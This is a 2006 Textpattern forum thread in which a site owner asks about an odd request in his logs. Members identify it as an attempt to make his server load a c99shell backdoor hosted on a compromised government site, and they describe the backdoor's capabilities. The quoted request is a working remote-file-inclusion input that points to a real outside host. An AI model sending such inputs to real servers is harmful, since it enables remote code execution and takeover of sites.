Textpattern CMS

#1 2006-10-13 15:09:37

root

Member

From: Manila, Philippines

Registered: 2004-05-31

Posts: 48

Non-Textpattern exploit?

yesterday, someone tried to access my site with this address:

/index.php?id=http://www.regionamazonas.gob.pe/amazonas/uploaded/images/news/htacess.PHP

what’s he trying to do?

(Edit: updated thread subject. -Mary)

Last edited by Mary (2006-10-13 16:41:37)

#2 2006-10-13 15:59:05

hcgtv

Archived Plugin Author

From: Key Largo, Florida

Registered: 2005-11-29

Posts: 2,722

Website

Re: Non-Textpattern exploit?

Looks like that Peruvian site has a back door installed called c99shell v. 1.0 pre-release build #16.

The server component offers many functions to the hacker who can use a normal browser as a backdoor client. Provided example shows the remote functionality provided by one such backdoor PHP script called “c99shell”:

• It is a remote file-manager that works through browser
• Can be updated remotely
• Has file-searching capabilities
• Can access files via FTP and Samba
• Can upload and download files and folders
• Can bind /bin/bash to any port with a password
• Can modify timestamp and access-time for any disk object
• Can execute any PHP code
• Can apply sha1, md5, crc32, base64 to files
• Has built-in operations with databases (list, sort, group operations)
• Can perform back connection to any IP address on a given port
• Can send improvement suggestins to the author via mail()
• Supports SQL
• Has self-removal function

Do a Google search for c99shell and read up on it, go onto your site via FTP and see if you have any extra files that weren’t there before.

Last edited by hcgtv (2006-10-13 16:01:05)

---

We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make

#3 2006-10-13 16:01:00

ruud

Developer Emeritus

From: a galaxy far far away

Registered: 2006-06-04

Posts: 5,068

Website

Re: Non-Textpattern exploit?

Hmm… there was c99shell installed on that URL, which seems to be some kind of webinterface installed by an exploit. A nice self-remove option was included, so it’s gone now before someone starts abusing it… although chances are that it will be reinstalled unless someone fixes whatever caused the exploit to work on that server in the first place.

This would not have any effect on TXP (IMHO)

#4 2006-10-13 16:40:58

Mary

Sock Enthusiast

Registered: 2004-06-27

Posts: 6,236

Re: Non-Textpattern exploit?

It’s certainly not caused by Textpattern.

#5 2006-10-14 11:06:54

root

Member

From: Manila, Philippines

Registered: 2004-05-31

Posts: 48

Re: Non-Textpattern exploit?

Darn, haven’t got access to FTP right now (host keeps kicking me out). I hope you’re right, ruud, that it’s not serious.

Sorry Mary, I should’ve been more specific :)

Ironic, though, that the Peruvian site in question is an official government website. Being infiltrated so easily and all ;)